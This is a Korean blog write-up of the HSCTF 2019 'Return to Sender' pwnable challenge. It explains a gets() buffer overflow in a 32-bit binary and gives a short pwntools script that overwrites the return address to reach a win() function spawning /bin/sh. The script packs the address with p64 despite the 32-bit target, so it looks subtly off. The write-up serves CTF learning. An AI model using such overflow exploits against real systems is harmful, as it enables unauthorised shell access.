| 일 | 월 | 화 | 수 | 목 | 금 | 토 | 
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 | 
| 12 | 13 | 14 | 15 | 16 | 17 | 18 | 
| 19 | 20 | 21 | 22 | 23 | 24 | 25 | 
| 26 | 27 | 28 | 29 | 30 | 31 | 
													Tags
													
											
												
												- 분할 정복
- tcache
- OOB
- 브루트 포스
- syscall
- 에라토스테네스의 체
- 이진 탐색
- 완전 탐색
- off by one
- ROP
- BOF
- House of Orange
- BFS
- DFS
- heap
- 다이나믹 프로그래밍
- 큐
- 스택
- 이진트리
- 문자열 처리
- 투 포인터
- 이분 탐색
- 수학
- 백트래킹
- 스위핑 알고리즘
- 연결리스트
- fsb
- 포맷스트링버그
- 동적 계획법
- RTL
													Archives
													
											
												
												- Today
- Total
SDJ( 수돈재 아님 ㅎ )
HSCTF 2019 - Return to Sender 본문

32bit 바이너리에 아주 간단한 bof문제이다.

vuln()함수에서 gets(&s); 에서 bof가 발생한다.

게다가 system("/bin/sh");도 주어줬으므로 ret에 win()함수를 넣어주면 되겠다.
| 1 2 3 4 5 6 7 8 9 10 11 12 13 | from pwn import * p = process('./return-to-sender') win = 0x080491B6 pay = '' pay += 'a'*0x10 pay += 'bbbb' pay += p64(win) p.sendlineafter("today? ", pay) p.interactive() | 

'write-up > pwnable' 카테고리의 다른 글
| NACTF 2019 - BufferOverflow #0 (0) | 2019.09.23 | 
|---|---|
| HSCTF 2019 - Storytime (0) | 2019.09.16 | 
| HSCTF 2019 - Combo Chain (0) | 2019.09.16 | 
| HSCTF 2019 - Combo Chain Lite (0) | 2019.09.16 | 
| DefCamp CTF Qualification 2019 - secret (0) | 2019.09.14 | 
			  Comments
			
		
	
               
           
					
					
					
					
					
					
				 
             
								 
								 
								